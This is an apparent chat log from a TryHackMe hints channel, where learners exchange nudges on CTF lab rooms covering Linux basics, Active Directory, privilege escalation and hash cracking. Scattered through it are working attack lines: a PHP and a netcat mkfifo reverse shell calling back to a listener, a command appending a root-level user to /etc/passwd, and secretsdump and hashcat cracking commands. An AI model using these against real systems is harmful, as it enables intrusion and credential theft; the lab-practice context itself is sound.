#room-hints
1 messages · Page 23 of 1
it does yes
So the browser control isn't dependent on the VPN
yes, but the in browser Windows 10 box doesn't have RDP
you are the default user in that session and that's it you can't log out and log in as someone else, I've even tried runas and the works, nothing
Windows ships with an RDP client
Connect to the VPN, use the VPN IP and RDP in with the admin creds
mind if I dm?
oh boy do I feel dumb....
lmao thanks bro, I appreciate you. I've been on tryhackme since 9AM so my brain is fried I guess
is the password in exact format or do I need to lose the space?
I'm trying to do the webappsec101 room and I'm having some trouble with finding the checkpassword page
I found on the /users/ directory there's a link to check_pass.php but when I try to go to ip/users/check_pass.php it tells me the page doesn't exist
@nimble onyx where on a website might someone want to "check password"?
maybe it 404s for GET requests
oh hmm
I tried every http action, no luck
hmm
I'm stumped ngl
is it possible the room is bugged?
Other people have had it working
still think my hint was a good one lol. Where on the website might you see or expect some function to check a password? Either way, with web apps you should be going through all functionality to understand what it does. If you do that, you'll see it
i can maybe take a look later on but I need to test this first
ah I found it, I'm dumb...
though I'm still confused, why wasn't it under users/check_pass.php
it was there in the directory
if you look at the request you don't get a 403 or 401 but a 404 it's possible the reference is there but file doesn't exist. If you look at the right one that you found you can see it's not the same filename
gotcha
hello everyone, so I'm at the WebAppSec 101 room [Task 4] Authentication q3:
"What is the name of the cookie that can be manipulated? "
i got the username & password for the admin account, why can't i log in
with the admin credentials
@true gazelle Think of a way to browse cookies
@shrewd skiff
I've found the cookie according to the instructions on the above site,
but nothing matches the answer
On this page:
have i got anything wrong?
@true gazelle you are asked to provide the "name" of the cookie. I would probably press F12 in the browser
i assumed it's supposed to be "PHPSESSID" but it's not
if i search through the F12 bar
i can see the very same cookie that i took a pic of Earlier
@true gazelle look again
Think about that a cookie can be described as more than just a cookie. This is hints so it's a vague hint.
Hey, can someone confirm that i am missing something in the RP: Nessus room at task 4 question 9?
at the question i need to answer this format
but the format does not match
is the webserver maybe updated to a ..* version instead of ..**
nmap also gives the same output, could it be a bug?
are you looking into one of the listed vulnerabilities?
look at vulnerabilities
@compact crown ^^
@rancid crystal @white salmon Yes i am looking at the vuln's
well
i feel stupid
at some point we all do
There will be multiple vulnerabilities, 22 in your case, and one of them contains your answer. I think you are looking at the open ports scan atm?
Yes, i am looking at the vulnerabilities, but i looked into the HTTP issues instead of the apache HTTP issues
i was about to say look at apache lol
the answer was in the apache HTTP issues category xD
glad you got it
@white salmon @rancid crystal thanks for the help!
Anyone did the steel mountain on oscp path here?
Trying to figure out the powershell -c question
Hi guys, is someone working on Jack's room? Stuck with the dictionary, seems that we need to use another wordlist but I've tried some without success...
@slender totem Think how you can list services with native powershell command
@sand lark Try a few wordlists that are installed by default on Kali.
@tidal sedge Okay, will take a look with another than rockyou. Thanks!
@sand lark Please check rule #1 in #rules
Next time please don't pm me without permission.
Okay, sorry. That was just to say thanks ^^
Introductory Networking, task 8, #6
there's no registrant adress
address*
i dont know what it's talking about
My guess
Would be that you didn't run the second scan
And are still looking at the first company @fossil cosmos
ok, thanks
Yeah, I've just checked -- that company definitely has a registrant address
Although you may need to read between the lines, given it splits it up into street, city, etc...
Hi guys, can anyone give me a hint for the "juiceshop"?
I'm trying task5.1, is it just a bruteforce? I can't seem to find any info about Jim
SQL Injection
I find ways to inject other requests, but not the reset method as written in the hint.
@hazy walrus if you're trying to reset Jim's password. Osint. Look at product reviews. Establish who Jim is.
Linux Challenges, Task 4, #7. Please help.
I really have trouble understanding how to stack commands, especially combining find with other things
@cedar path you can use regex
just use find and pipe to grep i think it should work
okay so I don't get it, I do "find /" which searched the whole system then "| grep -e 4bceb" for the specific string of character I'm looking for. In my mind that means "search everything, all lines in all files, for this specific sequence of characters"
I was typing the whole explanation but it seems like Muir got it
Hehe
:p
Muir understands my specific brand of stupid which I greatly appreciate
Muir is the kind of person who can literally explain things in a way you can get by thinking it through thoroughly once.
Aw
(Better hope that doesn't fail me. My job today is to figure out hashing algorithms, write one, and explain it in a blog post so that I don't drive anyone insane with this next room)
Ah, the one you mentioned few weeks ago.
Mhm
That's the one
I finally have time to implement it
So tempted to do it in Rust, just for the challenge.
That's my other job just now. Learn Rust
Share the link or the implementation if it won't spoil the room, ofc.
Hehe, I'll share the blog post once I've got it written. I'm posting that publicly anyway
The challenge in the room will be to understand how it all works, and purposefully break it anyway
wait before you go, let me pick thy brain. If my command as described above is looking for the file using grep, i can find files using 'find' so grep is redundant
I'm assuming you're going to make it vulnerable on purpose, if you don't it'd be one hell of a challenge that I'd love to try.
@cedar path Correct, yes
@night cave Ooh, that's an idea actually.
The challenge is going to be building the algorithm, and deliberately changing a few lines to make it a completely different output
The output will be a password in the room
Should require total understanding of the function to do it
Curious.
I wasn't going to write a post on it originally, but honestly, this thing is turning my brain into mush, and I like maths
Enjoying your Merkle Damgard constructions? @inland onyx
So, in english, what's the stack of commands to solve this :
Find flag 26 by searching the all files for a string that begins with 4bceb and is 32 characters long.
I used the 'strings' command in an earlier problem but that time I had a specific file to search through. I think it's a stretch to search the entire system for this specific line of characters
Dude, as much as I love reverse engineering and code analysis, I enjoy learning the implementations of hashes, I think I'll love that challenge :D
@stuck fractal Let's not even go there
@cedar path The question changed, but the location of the file didn't because that's a part of the VM which is a little harder to change
i'm doing the attacktive directory room and i'm stuck on task 7. i'm confused about what it means by "what method" and i can't get the secretsdump script to work. error:
[-] RemoteOperations failed: [Errno Connection error (spookysec.local/:445)] [Errno -2] Name or service not known
[*] Cleaning up...
Is it asking me to find flag 26 and then search the contents using what I learned earlier?
Name or service not known... I think it wants a protocol in front of spookysec.local?
@digital iris I think you need to specify -dc-ip
@tidal sedge yeah i have that in the command
this is my command ||secretsdump.py -just-dc -dc-ip 10.10.176.9 backup@spookysec.local||
Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)
my submission: find /usr/bin -type f -perm 4000 -name root. why is this worng
wrong*
@graceful nacelle Use symbolic format.
ugo doesn't have super users
@graceful nacelle No, but symbolic can
And it's technically u because it's related to owner
Oh wait my bad, didn't realise it was a room question, should have looked
find /usr/bin -type f -perm -u=s -name root.....smh its wrong
lmao
@graceful nacelle I believe you want instead of "-name" use "-user"
i get so frustrated sometimes...
we all do
alright well i just finished the "find command" course. Now im pretty confident it'll help me with task 33 in "LL".
as always thank you for the help
congrats @graceful nacelle, once you get to the last question of "LL" feel free to give me a hint. I am still struggling with it
i feel it man haha wish me luck
Something must be wrong, all that is given is just 'IP address'. No 'User Name', no 'Password'. How am I expected to get into the machine????????
@shadow basin I sure hope you're kidding
Small reminder. This is a hacking site
How do you think you're meant to get into the machine?
yeah.. I thought it was satire....
all good I think I found the way.
so it was a real question?
@peak girder that's what came to mind firstly. Then I remembered this channel's sincere sentiment "Try Harder" and since then all went "goot".
should be a life sentiment :p
/etc/shiba/shiba4
find: '/etc/polkit-1/localauthority': Permission denied
find: '/etc/ssl/private': Permission denied
find: '/home/shiba1/.gnupg': Permission denied
find: '/home/shiba1/.local/share': Permission denied
find: '/home/shiba1/.cache': Permission denied
/home/shiba4
/home/shiba4/.profile
/home/shiba4/.bashrc
/home/shiba4/.bash_logout
find: '/home/nootnoot/.gnupg': Permission denied
find: '/home/nootnoot/.local/share': Permission denied
find: '/home/nootnoot/.cache': Permission denied
find: '/home/shiba2/.local/share': Permission denied
find: '/lost+found': Permission denied
/opt/secret/shiba4
If i executed the binary correctly the password would be displayed in this giant list, wouldn't it?
No
ok
@graceful nacelle this list is the result of the "find" command. "Permission denied" means you don't have permission to search in those locations. Try redirecting it by adding "2>/dev/null", the result of the find command will look nicer.
but wouldn't find pull up the same results?
well nm that's actually why i didn't use find
Find doesn't run the binary for you though
I think #room-hints should be divided by user levels. For example: "easy", "medium", "hard"
/home/shiba3/home/test
this seems redundant. why am i being asked to make a home directory for test
That one is bugged
And that's not what you're being asked
And that's not how you do it either.
@graceful nacelle I had same problem.
it could have just been left alone from the start?
there's a directory called test in your home directory That's what it's testing for
Your home directory is a special file path in Linux
/home/yourUserName normally, with exceptions
@graceful nacelle in linux terminology when they speak "your home directory" they mean your "/home/username" directory. Not your "/home/username/home" directory.
@graceful nacelle use cd ~ it'll go to your home directory
after that use pwd so you'll know where you are
^
(sometimes it's just easier to see it than it being explained)
@peak girder Also, cd on its own will take you home.
One that people don't tend to know or use
yeah i really kept wondering how creating a home dir was beneficial.
a home directory is created on making a user... normally
a home directory doesn't have to be named home
home directory is just whatever the default directory is set to - which is why root's home directory is /root and not /home/root
woah woah woah.. @steady stratus don't explain him the leet stuff...
lmao
@peak girder Also,
cd on its own will take you home.
@stuck fractal yeah I don't use that because it tends to get stuck in muscle memory and I keep doing it unnecessarily. Plus.. if you'd explain that to a new user they tend to think that's only used for getting to your home directory :p
just muscle memory
@steady stratus it's annoying because i'll be going to my home directory for like.. 5 times every 2 minutes :p
hehehe yup!
also now we're on the track of cd, cd - is a great one to switch between directories
yup lmao
@graceful nacelle try and google! maybe read up on linux in general
oh yeah lol
sounds like Linux is not an OS you often use --> https://sushant747.gitbooks.io/total-oscp-guide/basics_of_linux.html maybe this'll help
doing these kinds of things is most of the time: "reading, reading, reading, trying that one thing, reading, reading, reading"
barely even a month into linux atm
maybe try bandit from https://overthewire.org/wargames/bandit/
It'll teach you A LOT about linux.. if you're going to do those, you can DM me anytime with questions and I'll give you hints on it
hell,... you can even have my old notes on the rooms (I'll take out the keys)
@graceful nacelle great! tell me if you need anything for that!
its gonna be a minute, i really wanna solve the current task at hand or else i won't be able to focus on anything else
bandit is fantastic, really struggled with the last few but learned a lot, and the rooms here on linux really solidified my knowledge and level of comfort with linux. Might have to do underthewire, I don't know how to do anything on powershell. I know there's a room here i'll have to do as well
anyone has done the final challenge of intro to python? i'm stuck
What's up with it?
i'm trying to use the function b64decode 5 times, then b32decode 5 times and then b16decode 5 times, with for loops
but doesnt work
I have a sneaky suspicion you've got that the wrong way around. Can't remember, one sec
he says its been encoded using base 16, then base 32, then base 64
so to decode i normally should start from the end
Yep, sorry, that's my memory acting up
but the coded string in the file doesnt look like base64, thats weird
You're on the right track -- I can't really do much more in #room-hints; you're on the right lines with decoding five times each, just remember to save the result each time
@sharp bolt Also, it might have been encoded the other way
as in outer layer is 16
Yeah the task is misleading
Can you paste the string here @sharp bolt -- I can't be bothered downloading the file
its over 2000 characters
Dang
but basically it looks like that 343333333433333333333333333333333433333334
hello everyone
im kinda stuck on a learn linux room
when i enter cat alone i get like prompted underneath and can't find a way to get out
on the putty remote machine that is
thanks that saved me lol
i tried starting with b16decode but i get a python error
Same ^^
woah
That is an ouch
i manage to decode the base16
just finished task 33.... the password actually made me lol
Great! @sharp bolt and @graceful nacelle
For basic pen testing room, any hints on how to find valid user? I've used enum4linux, nmap smb-enum-users script and rpcclient enumdomusers
Try enumerating manually
With smbclient?
This is hints. I gave you a hint
Investigating Windows: #10 tried every date
I got all the question except this one, I looked at event logs and file dates.
Got it
Good morning.
I wanted to ask a hint for jackinthebox but I clicked hint and found the flag. However can I elevate privileges to root in this?
I only managed to get the flag
I know for one that in OSCP you need to be root not just fetch the flag
I was trying to crack the hash yesterday but no dice
@tawdry dove there are two rooms that respond to the word "jack".. which of them is it?
I just wondered if anybody did it
I did
So the hint is:
Find a SUID which allows you to read files or operate with them
just list ALL the SUID files and it'll be pretty obvious on which one you should use
Hello!
I think I need a hint on basicpentestingjt
I'm at the 3rd question, and i don't know how to find the domain name of the server to use dirbuster ?
Did i miss something ?
you mean #3? @main mantle
Yeah
This one
I ran the nmap, and i've come to this : Discovered open port 139/tcp Discovered open port 445/tcp Discovered open port 80/tcp Discovered open port 22/tcp
maybe try running another buster?
@main mantle Directory brute-force port 80
I'll be right back
Thanks i think it's alright!
@glossy basin I completed the task. I got the flag but I never got root
That's what i was asking
oh
in this room you are not supposed to get root privs
just the flag
https://gtfobins.github.io/gtfobins/strings/#sudo <-- read this
@tawdry dove
it basically shows that you can only use it for accessing the file system
Hey, I could need a little nudge for "Tempus Fugit Durius". Got access, found some interesting things and can login into another service. But when I want to choose a mode, it doesn't work
Think I just jumped in the biggest of rabbit holes @ Tempus Fugit Durius
hey guys, can anyone help me out. im on the common linux privesc room and stuck on task 9;
#4
Now we're inside tmp, let's create an imitation executable. The format for what we want to do is:
echo "[whatever command we want to run]" > [name of the executable we're imitating]
What would the command look like to open a bash shell, writing to a file with the name of the executable we're imitating
@proud cloud the echo "text" > file means you'll put the string "text" into a file called 'file', does that help a bit?
you can append with >>
look here: http://www.penguintutor.com/linux/command-basics-reference and esp. look at: Redirecting Standard Output (stdout) >
thank you, I'll have a read through that now
hope it helps
Hello there! I'm doing the Ignite room (https://tryhackme.com/room/ignite).
There is a RCE bug in this Fuel CMS, i can try running commands like ls, but i can't create a reverse shell. I tried with
running the python and php interpreters, but i didn't manage to get a connection. When i look into "ps aux", i can't
see that my reverse shell is running (no permissions to php/python/bash?). I tried to set up a reverse shell
in a php file instead. I created one:
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
-rw-r--r-- 1 www-data www-data 0 May 2 06:07 test.php
But i actually can't write into it:
echo '$sock=fsockopen("10.9.0.0",444);exec("/bin/sh -i <&3 >&3 2>&3");' >> test.php
How is that possible? I have file perm to do it? Can someone give me a hint of what i should do?
@rapid flower Just use netcat to get a shell, you're over complicating things.
Or alternatively you could use this:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Tunnel IP> 4444 >/tmp/f
(Well worth reading up on that as well)
Thank you! I will try this up~
Running nc normally didn't help, but this long one solved everything.
Thanks @tidal sedge
You're welcome
need a little help on the 2nd challenge of the scripting room
do i understand correctly that my script needs to wait for port 1337 to be open as a starting point
and once it is, it needs to send it 0 as a first number
@sharp bolt just try it! you'll find out soon enough
"The Cod Caper - Try Hack Me (Writeup)" by Govind Sharma https://link.medium.com/ZFMFX1pP45
(Submit it on the room -- not here @shy sinew)
@wooden mist Can I DM you about the ConvertMyVideo challenge?
I have submitted it on the room but it is shown in the writeup section yet @inland onyx
The room author (muirl in this case) has to accept it before it is added as a writeup
it will be after the owner approves it
@vernal ridge i'd prefer not as the room was just released
oh okay
Someone online I can ask a yay/nah question about Tempus Fugit Durius?
I don't know how far you've gotten on that machine, but maybe I can answer you, @pine ermine
anyone done ctf100 task 74? can't seem to find the password
@pine ermine I can answer. I think
@hot skiff could you give me a hint for flag 2? I think I enumerated everything multiple times and am getting crazy
@white pike You usually scroll right past this bit when examining LinEnum output. At least I often do.
Hahah thanks @hot skiff - I've got confirmation I was deep into a rabbit hole. I'm trying harder as we speak. Hope to find something soon!
Any hints for the convertmyvideo room? I've been stuck for a while
same here, stuck on privesc if anybody feels like giving a nudge (convertmyvideo)
I tested it, so I can't really give much here
I will suggest not over thinking it though
It's comparatively a simple privesc
hmm okay thanks.. I may be overlooking something
hey @nocturne vault can you give me a little nudge on getting a foothold on the box (convertmyvideo)? found the hidden dir but cant find a username
sure DM me
Could I ping something off somebody about Tempus please? I think I might be deep in a rabbit hole but not sure
@wraith marsh Please keep the imagery PG13
Sorry
can someone give me a hint for 25days of christmas task 10 question 2?
Task 10 or day 10?
task
just noticed there's a resources link i'll check that out just can't find her actual occupation and no linkedin from what I saw aha found an archived page with an official occupation title sorta listed but that wasn't right. I'll keep checking stuff ๐
ugh I saw it, tried it but it said incorrect should've copied and pasted or made sure I was typing it correctly lol
what is wrong in this??
What if you're in the owner's group?
u mean i should write 664
@scarlet plinth You're in the hints channel. I gave you a hint, something to think about.
ok
Hi guys, https://tryhackme.com/room/juiceshop Task[5] #1, any hints on where should i look for more info on Jim?
@stuck fractal ok, thanks
Man I cannot get a foothold on convertmyvideo, any dm nudges would be appreciated. I am serving it files but not sure where to get my foothold
nvm I think I'm on the right path
is there a reason smb1 is disabled on the Active Directory box? i need to access it with smbclient and i have the password but it says it's disabled. i need a file in there
it says "Using utility can we map remote SMB shares?" then asks to grab a file with it. do i still rdp in?
and it's smbclient. so i figured that's what it was. i just wanna make sure we are thinking of the same thing.
its this box https://tryhackme.com/room/attacktivedirectory
task 6 #5
shit there are walkthroughs, sorry. don't wanna waste anyone's time when there are lol my bad
yea lol suhh
@graceful sun SMBClient will do more than smbv1
gotcha. and like on the walkthrough it's showing on his smbmap the shares and what's in the files. i do the same command but i only get the share names not the contents, do you know why that might be
@graceful sun smbmap doesn't give you the contents of files
odd. his did https://fr33s0ul.tech/attacktive-directory-thm-write-up/ well thats good to know
@graceful sun Nope.
what are all those files under the shares that i didn't get on his smbmap? just wanna know so i learn, not doubting you
That's the files on the share
lol sorry i been looking at the writeup as little as possible so i didnt see that haha
[-] RemoteOperations failed: [Errno Connection error (spookysec.local:445)] timed out
sorry so now i got the passwd but im getting this.
doing the same thing in the write-up
i wonder if my metasploit is still running and blocking it or something
nope
im gonna stop now.... it expired and didnt tell me .... lol
the problem is still there tho. wth
wow, i got it now...
When sending data over TCP, what would you call the "bite-sized" pieces of data
what does this mean?? and answer please
re-read the text before the questions all the answers are there
also don't spam multiple rooms with the same question
In yearoftherabbit I found this
What could this be?
||+++++ ++++[||
Some kind of code
Found it.
Hi all
I need a little help on https://tryhackme.com/room/tempusfugitdurius. Can anyone ping me pls?
Hi everyone. I'm doing the "ConvertMyVideo" room but i can't find the user(task2). Can anyone give me a hint on what i am supposed to do?
Hello, I am doing the "Agent Sudo" room. I can't get any progress on it, can anybody please give a hint.
Here is what I have tried:
I think it has something to do with the User-Agent field of a http request. So I replace the value of the field with "sudo" cuz the challenge name is agent sudo.
I tried to connect to ftp using anonymous but didn't work.
I tried the metasploit module for "ssh user enum". I got a username and tried to put the username in the User-Agent field.
I tried brute forcing ssh using hydra with the username I got.
Please help, what I am missing.
@lament yacht sorry did you specify at which task you at?
At the first one.
@lament yacht And what exactly is your hazard? What does the task ask, and at what are you struggling?
@smith3301
It is Task 2
Question: How do you redirect to the secret page?
Question: What is the agent name?
I got one username by "enumerating ssh for username" but it is not working. So I am stuck at this point. Can't get any progress.
@lament yacht Have you enumerated the web page?
@heady pulsar
I tried gobuster with the medium list. But it got to 30% with no progress, so I stopped.
@heady pulsar
I will try it again.
@lament yacht Sounds good. if you're not having luck with a medium list, try a big list or a different one
@heady pulsar Ok. Thank you very much.
good luck. One of the methods you tried (listed early) will lead you further in
Hey. A hint for privilege escalation on yearoftherabbit?
Nothing pops out
I tried some paths but no dice
do the other rooms by @inland onyx, @tawdry dove you will know afterwards
soz for the ping
^^ this
Ha! Thanks. Never thought that program could be vulnerable
anyone done ConvertMyVideo room ?
@steady stratus may I PM you and ask if I'm on the right track of PE in Tempus?
Hi! I'm doing the common linux privesc room and I need to create a new user with root privileges (task 6 question 5). I can write to /etc/passwd. I created a password hash with ||openssl passwd -1 -salt new 123|| and did ||echo new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash >> /etc/passwd|| but I can't su new with password 123, it says authentication failure. if I look in /etc/passwd it shows new::0:0:root:/root:/bin/bash (no x for password). Am I missing something?
normally where does linux store the hashes?
etc/shadow?
I guess you need to use single quotes on your echo statement. So echo '...' >> /etc/passwd
Otherwise the special characters will screw things up
quotes worked thanks
Hi everyone. I'm doing the "ConvertMyVideo" room but i can't find the user(task2). Can anyone give me a hint on what i am supposed to do?
Hi all! BP-Volatility Task4#3. I've uploaded the infected files to hybrid-analysis.com but I can't see the name of the malware to answer the question; i.e. a name that has 6 characters.
@marble bridge You will find the user when you figure out how to exploit the Converter.
Where would a HTTP Auth (basic auth) users creds be stored?
I'm having trouble with Q5 of task 2 of intro researching. pls help
@queen torrent https://hashcat.net/wiki/doku.php?id=example_hashes
thxs for the help
(That might not be the best way to encourage researching @white salmon)
I know
It is literally a room teaching people how to research.
is there a way to make the hashes cracking faster?
@outer meteor GPU (CUDA)
@outer meteor have an expensive PC
what are you trying to crack
and how
ok with raspberry or with gpu?
raspberry pi
i'm in a VM
this is bad
what do u mean
the windows version is better
for everything else
no i personally have a laptop with linux
I have it in VM and its just fine
how do u crack passwords then?
i mean for THM purposes. Are you doing brute force with or without a wordlist?
with
if I have a hash to crack, I copy it to windows because I have a 1080 TI there
which wordlist are you using?
rockyou.txt (idk other wordlists)
so, there is nothing to worry about. Until now, i didn't need much time to make the attack. Up to 15% so far
but mine was running for like 30 min and got 0.02% :/
WOW, thats so slow
ahaaha
do you have gpu?
well, use hashcat in host then
It's a nvidia 940mx
should be better than that number
yeah but how do i use it?
CUDA
pass the hash to your host with any tool. Even you can use drive to upload the file and download with the host
then use cuda
like kobims says
@outer meteor download hashcat on windows, open powershell
xD
hey, what kind of wordlist should i use to make an "extension" attack with burpsuite
?
I'll try then
@grand pivot make your own, you probably don't need as many anyway
which one do i download binaries or sources?
Idk
@white salmon No.
I'm dumb
Nvidia drivers come with cuda stuff @white salmon
ty
Gaming laptop, it will have cuda working
@outer meteor source code is the raw program before it's been compiled
You don't want to have to compile it.
Binaries are compiled code
ty :)
I have a problem here: Hacking with Powershell[Task 3][#3]I have tried:||Get-Command | measure = 7935|| but it is not accepted can someone help me ?
another thing do i need any wordlist to get the cracked password?
because it didn't work
send the command
hashcat64.exe -m3200 -a0 -o cracked.txt hash.txt
You stopped it earlier
And sorry, what
Those arguments
Talk me through them.
Mode is bcrypt
-a0 is redundant, don't need it
What's the two txts?
hash.txt is the hash and the other is where the cracked password is going to
Don't do that
where is the wordlist ?
You need to give it a word list otherwise it expects input from stdin
@white salmon i was thinking about that xD
hashcat64 -m 3200 hash.txt rockyou.txt
but i need to download the rockyou.txt
-O (capital o) for optimised
Yes
Google "rockyou.txt" and click the brandon orsey naive-hashcat one
Put it in the folder
i can run this command then : hashcat64.exe -m3200 -O cracked.txt rockyou.txt
hello
hi
@outer meteor nope, you're missing something
-m 3200
you dont need cracked.txt
jesus christ
so much information
so i can do
hashcat -m 3200 hash.txt rockyou.txt -O
?
yes
Yes.
gonna try it now
It doesn't make it faster for all hashes, but it won't make it slower for those ones
It will take a long time
Even on my GTX 980, it takes a long time
i mean it's only one password
Doesn't matter
really?
sorry for being this dumb
If the hashing algorithm needs more VRAM, hashcat will tell you
i feel bad for asking u guys a lot of this stuff
@white salmon i saw that ahaah
it's alright
what happens when it finds the password
it stops?
it blows up
SHIT
@outer meteor DW, you'll probably be cracking for another decade or so
Bcrypt was specifically designed to be about as fast on a graphics card as it is on a CPU
940MX is showing its age now
Learn more hacking -> Start making boxes for TryHackMe -> Make commissioned boxes -> buy PC
I currently do
could u tell me some rooms you've made?
And some KoTH boxes
Does someone know why this would happen?
I started a simple nc listener and am receiving a (reverse shell) connection, but it's completely unresponsive. I tried python, bash, etc, all I am getting is:
nc -lvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.168.15 38827 received!
ls
Some sort of firewall on the box?
Reverse shells are designed to get around that
Yea
What box?
Tempus Fugit Durios
Can't really help then
I want to start making boxes so I can eventually make commissioned boxes and be on the THM creators program, but I'm not confident in making boxes. I can make all kinds of OSINT, crypto, and stego challenges but I need to practice making boxes
Just do it for fun to start with
Alright, sorry - did get a responsive shell now. Nevermind me :p
I stopped the cracker because it can't do anything
my gpu is too slow
it was on 0.11%
not even 1%
@outer meteor So you can use your brain to speed it up a bit
;(
You know the length of the password, and you know it's in rockyou
Why not filter rockyou to only 4chars?
Much less time
yeah but with my gpu it will be the same thing
Not really
it will take a day probably
Reducing the amount of passwords it has to try will reduce the amount of time it'll take to crack it
can u tell me then what do i put in the command?
Huh?
You have to filter the wordlist
Basically making a new wordlist
Brute force, you don't know what characters are in it so it's (26+26+10) for a-zA-Z0-9 and then that ^4
That's 14million possibilities
Same as rockyou, roughly
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a ...
pw-inspector in kali
the room steel mountain, what cve is it expecting? i found couple and it won't accept...any of it
yeah, thinking of this 1: https://www.exploit-db.com/exploits/39161
but it won't accept my answers
damn, feel stupid now. i thought i had tried every combination already, also that one. tried it again... it works. thanks ..
Answer format.
Count the little * to confirm in the future.
hey guys how do I download a smb share
Then you didn't google it right
I'm going to do it again
You don't mean download a share.
You want to access a share and download files
You can't download a share
A share is not a file
@stuck fractal dude is there a command to run hashcat with the gpu, or is it already using the gpu?
because when i go to task manager it wasn't using any of the gpu power
I think you can do something like -D 1 or whatever the device ID is to switch hashcat to cpu
Printscreen your hashcat powershell window
you mean i have to do it in powershell not in cmd
Have to is a bit strong
now i got confused
You can use CMD but CMD is worse than powershell in general
no sense
it's using memory and cpu only
otherwise it would show up in the task manager
It's using the GPU.
Then i need an explanation
I still need to filter this wordlist
It ain't gonna be any faster than using your CPU though most likely
press s and tell me your speed
5 H/s
from what i've read the bcrypt isn't GPU friendly
it's a laptop's GPU
F
but can't the cpu like "help"
You're cracking on the GPU
Cracking on that CPU should be faster
Download John Jumbo
(This advice applies only to bcrypt)
Doesn't work in hashcat with cpu then?
I've only seen ways to do that on Linux
i think if you use -D 1 you'll use the cpu
I'll search if there is a way
Yeah but that was wrong
Nvidia drivers come with it
It wouldn't work at all if you didn't have it set up right
ok
I have a problem with cc pentesting
For the hidden file
I enumerated them all with gobuster but no one works
i think you use gobuster that gives like 4,5 results and one of those is the hidden directory
@novel jackal What's your full command?
any idea how i can check my OpenCL version on windows 10?
gobuster dir --url <ip> -x xxa --wordlist big.txt
Is it inside the directory you already found?
Also, delete the name of it as it's an answer
@outer meteor Updating stuff isn't going to make it any faster. The 940MX is a slow card. Download john, use that.
"didn't work" what do you mean?
I'm not gonna leave it 31 days until it finishes
It won't take 31 days
But filter the wordlist and use john and it'll get it pretty quick.
and i can use the john in linux or in windows?
So did you filter rockyou down to 4 chars to form a new wordlist?
4char only passwords
idk what the command is xD
You need to learn to do some research
watched a video on that
Learn to use manpages and built in help as well as google
why can't i drag the new rockyou.txt to my downloads on windows
I'm not going to answer that
They're the same files
downloaded the big boi file
You could have downloaded the smaller one if you had 7zip...
That's not what made it faster
Running it on CPU made it faster
Filtering the wordlist means you can find it with less guesses
and it's faster
It's faster because you're not using a terrible GPU
@outer meteor Rule 13.
doesn't exist here
room learn linux task 33: I made a directory called test and inside it I put a test1234 file, yet even trying to search the whole system with find /* I cannot get hold of shiba4. Did I mess up somewhere?
ohhh
/* is interpreted in bash
mhhh not too sure what that means
okay but at least i understood what im doing wrong so thanks
Hi guys, I am playing on "Geolocating Images" room and getting no clues about Task 6. I have recognized the monument on the back and think I got the overall location on a map but do not know how to advance, any nudge for me?
google maps and think about what direction you're looking
Well no direction on image 3. Looks like an observatory but no luck with it
|| you are going well, very well||
||also try to watch around, what are in the image in the background? whats the geology of that image?||
there are 2 things very very very symbolic of that place and you can find it really fast (at least the place where it is)
room learn linux task 43, meaning the last one: I'm stuck eyeing a readme file yet I don't have permission to read the thing. Any tips to get around that? Tried to use chown and also chmod without success
@quartz furnace You need to get root to get the root flag
well i thought maybe i had to look up the password to root first to then be able to access the flag
If you could just look up root passwords, hacking would be a lot easier
so im like
can't find a way to change the root directory
Wat
to change user group to root right
nvm
already tried switching to shiba1 which is in the root group yet got no access to the folder so i dunno lol
I don't think you quite understand
actually now that im looking at it ur right only user can access the folder
so any tips to become root without a password?
well i just begun so i have nooooooooooo idea
The room teaches you how to run commands as root, right?
@stuck fractal yeah so?
Well, shiba1-4 don't have sudo. But there's more. Maybe look for files belonging to each and every user.
You can extend them
And for that machine, the passwords act as checkpoints so you can redeploy and pick up
y i kn but it's so frustrating not finding a single clue >.>
It's harder than the rest of the room, but easier than most of the challenges here
Privilege escalation is something you learn
"Privilege escalation"well that's all i needed to hear
Using tools and scripts ain't gonna work for this one
aaaaaa
tried looking btw all shiba noot directories so far, I can't come up with anything. any more hints?
recovery-mode/options/root. am I on the right track for task 43?
@graceful nacelle In learn linux? No
Look for files belonging to each and every user
hmm thank you
@stuck fractal okay that's interesting. why did a new path appear after i did that but not when i went through every single user?
I have absolutely 0 idea what you mean.
lol that's good. you guys do an amazing job. thank you
The trick for Linux walkthrough's last flag is to add a user to sudoers right?
Or if you're in sudoers already
Hmm I see
I feel that's misleading @keen zealot
You can be in sudoers and be able to run sudo and not have root perms
True
@torpid geode Look for files belonging to each and every user. And I do mean each and every, not just shibas
OK i'll try that
anyone here who can give me a hint on Tempus Fugit Durius? I got shell and found the file with the credentials but now i'm stuck
is it related with .sudo_as_admin_successful?
Not really?
damn
anyone give me a hint for privs esc on room ConvertMyVideo ?
@sick sun I can't give you anything specific but this is all you're likely to need https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md
thanks man i try it
Any hints for flag2 of /room/tempusfugitdurius
can anyone help me with intro to python challenge
what is your question?
can i dm u
you can ask here right?
ok
then
i have my code which runs perfectly
but gives me a result of ' 'this only
which task are you on?
to encode a code
5 times base64
5times base 32
this is my code
dont know whats the prob
ok, pls remove that or mark it as spoiler
we can use else right after for
no no we can use else after any loop i read it and also tested it
when the for loop ends it continues to the next statement on its own
actually
alrighty
when i decode my code from base 64 1 time it gives me
weird text
on 2 time the result become as ' '
lots of /xdf}/xdf7/
like on first iteration
Hi. I'm doing the room "Intro to x86-64" of reverse engineering and I'm stuck on the crackme1 file. Do you know how to find the correct password? I added a breakpoint at the first compare function, but in the buffer of the var_4ch variable there is something wrong.
im using r2 disassembler
@static rampart try to declare data first: data = ""
then use it
